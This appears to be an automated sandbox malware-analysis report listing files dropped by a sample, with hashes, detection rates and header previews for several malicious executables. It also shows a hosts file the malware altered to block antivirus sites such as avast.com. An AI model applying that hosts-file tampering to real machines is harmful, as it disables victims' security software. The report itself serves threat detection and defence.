SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Broom.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5515264
Entropy (8bit):	6.479505821994318
Encrypted:	false
SSDEEP:	98304:X4zVE2GO5za356R7mgdqMhW8hQjqb0It:gl7mg1WO
MD5:	00E93456AA5BCF9F60F84B0C0760A212
SHA1:	6096890893116E75BD46FEA0B8C3921CEB33F57D
SHA-256:	FF3025F9CF19323C5972D14F00F01296D6D7A71547ECA7E4016BFD0E1F27B504
SHA-512:	ABD2BE819C7D93BD6097155CF84EAF803E3133A7E0CA71F9D9CBC3C65E4E4A26415D2523A36ADAFDD19B0751E25EA1A99B8D060CAD61CDFD1F79ADF9CD4B4ECA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\Broom.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................?..........1?......@?...@..........................PV..................@...................0B.......A.@<...0G......................`B.t............................PB.....................p.A.D.... B......................text...\.>.......>................. ..`.itext...A....>..B....>............. ..`.data...d....@?.......?.............@....bss........ @..........................idata..@<....A..>....?.............@....didata...... B......:@.............@....edata.......0B......F@.............@..@.tls....T....@B..........................rdata..]....PB......H@.............@..@.reloc..t....`B......J@.............@..B.rsrc........0G.......E.............@..@.............PV......(T.............@..@................

C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	2671908
Entropy (8bit):	7.668464601080612
Encrypted:	false
SSDEEP:	49152:Cl2s5FXQ4EmojLjCRELVf7Avil+dHIsLp1thIikN+6u2hs+:CzzX71oDCRAZUviAHImDqia7hs+
MD5:	BC3354A4CD405A2F2F98E8B343A7D08D
SHA1:	4880D2A987354A3163461FDDD2422E905976C5B2
SHA-256:	FFFC160A4C555057143383FEC606841CD2C319F79F52596E0D27322A677DCA0B
SHA-512:	FE349AF0497E2AA6933B1ACFEA9FECD2C1F16DA009A06AC7D7F638353283DA3EF04E9C3520D33BAE6E15EA6190420A27BE97F46E5553A538B661AF226C241C6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P..X............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fwfusmx.53q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajxehzs2.pba.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2ju2lpn.nes.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khqekvwt.xrb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvwknv33.0rr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p13v0hnm.slc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrpi01ro.qed.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ud3uqx1a.4d3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlvxdqt0.0nw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmjxantf.i5s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeazrs5d.anl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydhko4t0.aun.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4360056
Entropy (8bit):	7.977276231616674
Encrypted:	false
SSDEEP:	98304:WkiZGwIB1dt+0CwQfqt+LbrNwxxujFg72jYYPbx4:Wkikw8dt+0C/IMhwxgi72jYh
MD5:	2A92DBDA3DF9502DEF5E1C9009950699
SHA1:	2FC2B1E67DE8FF36F36F65A6F54BE1C141D9AE1A
SHA-256:	2CDE7B9FC5ACD7964916D023E78D42AE7AC6D511C5CD7CA57B066A94882A67EC
SHA-512:	C1BF6076B20BAAC199F6786271A1959A19FEC82B32AB9944226104FFF3CD5D94FBCC5A6F1EF6BA04E3B05E397EBDF88416AE27204FDAEA4F67D1C03749636069
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v...v...v.w....v......v......v......v.....v...w.;.v......v......v......v.Rich..v.................PE..L....&$c.................4A...:..............PA...@.................................Z.B....................................../A.......z..............\|B.x...........................................@L..@...............D............................text....3A......4A................. ..`.data.....8..PA..L...8A.............@....rsrc.........z.......A.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\latestX.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5874968
Entropy (8bit):	7.70017826439962
Encrypted:	false
SSDEEP:	49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05
MD5:	BAE29E49E8190BFBBF0D77FFAB8DE59D
SHA1:	4A6352BB47C7E1666A60C76F9B17CA4707872BD9
SHA-256:	F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87
SHA-512:	9E6CF6519E21143F9B570A878A5CA1BBA376256217C34AB676E8D632611D468F277A0D6F946AB8705121002D96A89274F38458AFFE3DF3A3A1C75E336D7D66E2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....?.d...............&.....xY................@..............................Z.....@.Y...`... ...............................................Y.p.....Y......PY......\|Y..)....Z.0........................... <Y.(.....................Y.`............................text...............................`..`.data.....W.......W.................@....rdata...>....Y..@....X.............@..@.pdata.......PY......6Y.............@..@.xdata..L....pY......PY.............@..@.bss.....-....Y..........................idata..p.....Y......dY.............@....CRT....`.....Y......pY.............@....tls..........Y......rY.............@....rsrc.........Y......tY.............@....reloc..0.....Z......xY.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\toolspub2.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	6.491820168131084
Encrypted:	false
SSDEEP:	3072:MkULcl5ZxKJo8LwzbXyTi4UDcVpdLdKHJPOCv09I3i+9P7HbMsoOz1:LUa5p/bXyTi4iGTdAJ7pf0sv
MD5:	DCBD05276D11111F2DD2A7EDF52E3386
SHA1:	F5DC6D418D9FB2D2CFA4AF440EC4FF78DA8F11EC
SHA-256:	CEA5245BAB036B03F89D549C71F47DF8A14854B0DE515643BF95319EC5AF71D4
SHA-512:	5F1A9C993CD5394E23B39C43CC7479355C922D1EE8EA48109BBAD805209DEE697E20759257ECA9E2F1B75D34A8C4B4C428A736FA8A468DC18DE6C44CB6394846
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v...v...v.w....v......v......v......v.....v...w.;.v......v......v......v.Rich..v.................PE..L....z.b......................9...................@...........................<......C......................................X.........;.............................................................@L..@...............D............................text............................... ..`.data.....8......L..................@....rsrc.........;......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cdttvvc

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	6.491820168131084
Encrypted:	false
SSDEEP:	3072:MkULcl5ZxKJo8LwzbXyTi4UDcVpdLdKHJPOCv09I3i+9P7HbMsoOz1:LUa5p/bXyTi4iGTdAJ7pf0sv
MD5:	DCBD05276D11111F2DD2A7EDF52E3386
SHA1:	F5DC6D418D9FB2D2CFA4AF440EC4FF78DA8F11EC
SHA-256:	CEA5245BAB036B03F89D549C71F47DF8A14854B0DE515643BF95319EC5AF71D4
SHA-512:	5F1A9C993CD5394E23B39C43CC7479355C922D1EE8EA48109BBAD805209DEE697E20759257ECA9E2F1B75D34A8C4B4C428A736FA8A468DC18DE6C44CB6394846
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v...v...v.w....v......v......v......v.....v...w.;.v......v......v......v.Rich..v.................PE..L....z.b......................9...................@...........................<......C......................................X.........;.............................................................@L..@...............D............................text............................... ..`.data.....8......L..................@....rsrc.........;......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Logs\CBS\CBS.log

Download File

Process:	C:\Windows\servicing\TrustedInstaller.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
Category:	modified
Size (bytes):	6553600
Entropy (8bit):	5.255566419997682
Encrypted:	false
SSDEEP:	24576:KV5tI95VcEDi0v3lchlh6lRdKNhFk15N:KV5tI95Vr3lchlh6lRdKNhFk15N
MD5:	6678E27338C07E7517BF9BAF7B45701A
SHA1:	F5E53F263B1591147D8EC81CF895D809FB3C4EE8
SHA-256:	FE93B88D92FAB054DBACEFC6B90633BB49F90FD012761349A99D166199372C45
SHA-512:	1E9D24EC644BCE6438A513D47E6E218C6C19DE319FF0F70CDF38CF294DD189A0211D8CA110421D378FC4083164C091FCEA6DDD9DC004201B8B35C32509C70B40
Malicious:	false
Preview:	.2023-10-03 09:57:33, Info CBS Starting TiWorker initialization...2023-10-03 09:57:33, Info CBS Lock: New lock added: TiWorkerClassFactory, level: 30, total lock:2..2023-10-03 09:57:33, Info CBS Ending TiWorker initialization...2023-10-03 09:57:33, Info CBS Starting the TiWorker main loop...2023-10-03 09:57:33, Info CBS TiWorker starts successfully...2023-10-03 09:57:33, Info CBS Lock: New lock added: CCbsWorker, level: 5, total lock:3..2023-10-03 09:57:33, Info CBS Universal Time is: 2023-10-03 08:57:33.888..2023-10-03 09:57:33, Info CBS Loaded Servicing Stack v10.0.19041.1940 with Core: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1940_none_7dd80d767cb5c7b0\cbscore.dll..2023-10-03 09:57:33, Info CBS Build: 19041.1.amd64fre.vb_release.191206-1406..2023-10-03 09:57:33

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2224
Entropy (8bit):	5.354902188542171
Encrypted:	false
SSDEEP:	48:CWSU4y4RFymFoUeW+gZ9tK8NPdMs7u1iMuge//MaOUyu0lhV:CLHyIFvKLgZ2KlDOugQ01
MD5:	F13A8AE7B44AED9EC883230BE2CAEEBF
SHA1:	AF46C488E496FF2C8B0FC9A872176C6E62C21E11
SHA-256:	B8C593406BB32D1B91CBCBA7266C8F68EF24BE57F48F320F96A45D715DB54D62
SHA-512:	EFAA6424D0AED672CC7D673FBDBEF7B6FC12A312E01A65742879F0709ABE9A51CECB4A60166EFA97898242644437E6B09AABF4006B0793ED31FEB62ECFF70F12
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\AppData\Local\Temp\latestX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2748
Entropy (8bit):	4.269302338623222
Encrypted:	false
SSDEEP:	48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
MD5:	7B1D6A1E1228728A16B66C3714AA9A23
SHA1:	8B59677A3560777593B1FA7D67465BBD7B3BC548
SHA-256:	3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
SHA-512:	573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

C:\Windows\Temp\__PSScriptPolicyTest_30dylhzv.kud.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_3ma2rsxl.y03.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_4knuarqu.bat.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_55jy3kl2.nkj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_bf4tbakq.hmb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_elid40q4.cpj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
